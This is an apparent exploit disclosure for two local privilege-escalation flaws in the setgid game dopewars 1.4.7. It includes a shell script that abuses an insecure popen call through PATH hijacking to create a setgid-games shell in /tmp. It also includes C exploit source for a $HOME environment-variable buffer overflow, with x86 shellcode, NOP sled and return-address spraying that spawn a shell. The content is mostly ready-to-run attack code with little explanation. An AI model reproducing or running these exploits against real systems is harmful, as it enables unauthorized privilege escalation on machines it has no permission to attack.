two security holes i found for local use in dopewars(1.4.7-current). dopewars is setgid=games. by: Vade79->v9[v9@fakehalo.org]. LOCAL VULNERABILITY #1: insecure popen call, a shell script can handle this. -- dopewars.sh start -- #!/bin/sh # dopewars.sh(1.4.7): shell script by Vade79->v9@fakehalo.org. gives gid=games. # insecure use of a popen call while setgid isn't good in any situation. DOPEWARS=`which dopewars` if [ "$DOPEWARS" ]; then echo "[*] dopewars binary found: $DOPEWARS." else echo "[!] dopewars binary was not found, aborted.";exit fi CHECK=`ls -l $DOPEWARS | grep sr-` if [ "$CHECK" ]; then echo "[*] dopewars found to be setgid, proceeding." else echo "[!] dopewars NOT found to be setgid, aborted.";exit fi PATH=/tmp:$PATH cp /bin/sh /tmp/gidsh echo 'main(){system("chgrp games /tmp/gidsh;chmod 2755 /tmp/gidsh");}'>/tmp/more.c cc /tmp/more.c -o /tmp/more cat </tmp/dopecmds help quit X dopewars -s/dev/null 2>&1 rm -f /tmp/more* /tmp/dopecmds CHECK=`ls -l /tmp/gidsh | grep sr-` if [ "$CHECK" ]; then echo "[*] success, setgid shell is in: /tmp/gidsh." else echo "[!] failed, the setgid shell doesn't exist." fi -- dopewars.sh end -- LOCAL VULNERABILITY #2: $HOME buffer overflow in versions 1.4.3-7(current). -- dopewars_bof.c start -- /* (linux)dopewars[v1.4.3+] local buffer overflow, by v9[v9@fakehalo.org]. dopewars is SGID(=2755)=games by install(make install). this overflow is true for versions of dopewars 1.4.3 to 1.4.7(current). syntax: ./dopewars_bof [offset] [alignment(0-3)] ./dopewars_bof -200 1 the basic overlow(dopewars.c): -- pt=getenv("HOME"); if (!pt) return; if (strlen(pt) > 770) { sprintf(ConfigFile,"Home directory %s too long.",pt); ReportError(ConfigFile); return; } sprintf(ConfigFile,"%s/.dopewars",pt); -- "the home directory is too long! so what? lets contiune anyways." note: even in the current version of dopewars(1.4.7) there appear to be some remote overflow possibilities from server->client(bof the client with a bogus server). you can even overflow the server just by simply sending a large string(eip=0x0..). i am just making a note of lots of unchecked buffers. also, $HOME is too common a overflow for this to occur. :) */ #define PATH "/usr/local/bin/dopewars" // path to the dopewars program. #define GID 20 // group id of games. #define DEFAULT_OFFSET 200 // if no argument #1. #define DEFAULT_ALIGN 1 // if no argument #2. static char exec[]= "\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3" "\x00" // soon to be gid=games. "\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07" "\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08" "\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40" "\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69" "\x6e\x2f\x73\x68\x01"; // my usual shellcode for these situations :) long esp(void){__asm__("movl %esp,%eax");} int main(int argc,char **argv){ char bof[800]; int i,offset,align; long ret; if(argc>1){offset=atoi(argv[1]);} else{offset=DEFAULT_OFFSET;} if(argc>2){ if(atoi(argv[2])>3||atoi(argv[2])<0){printf("%s: %s is an invalid alignment, use 0-3.\n",argv[0],argv[2]);exit(-1);} else{align=atoi(argv[2]);} } else{align=DEFAULT_ALIGN;} ret=(esp()-offset); printf("[ return addr: 0x%lx, offset: %d, alignment: %d. ]\n",ret,offset,align); exec[10]=GID; for(i=align;i<800;i+=4){*(long *)&bof[i]=ret;} for(i=0;i<(800-strlen(exec)-50);i++){*(bof+i)=0x90;} memcpy(bof+i,exec,strlen(exec)); setenv("HOME",bof,1); if(execlp(PATH,"dopewars",0)){ printf("%s: defined path %s did not execute correctly.\n",argv[0],PATH); exit(-1); } } -- dopewars_bof.c end -- Vade79 -> v9@fakehalo.org -> www.fakehalo.org.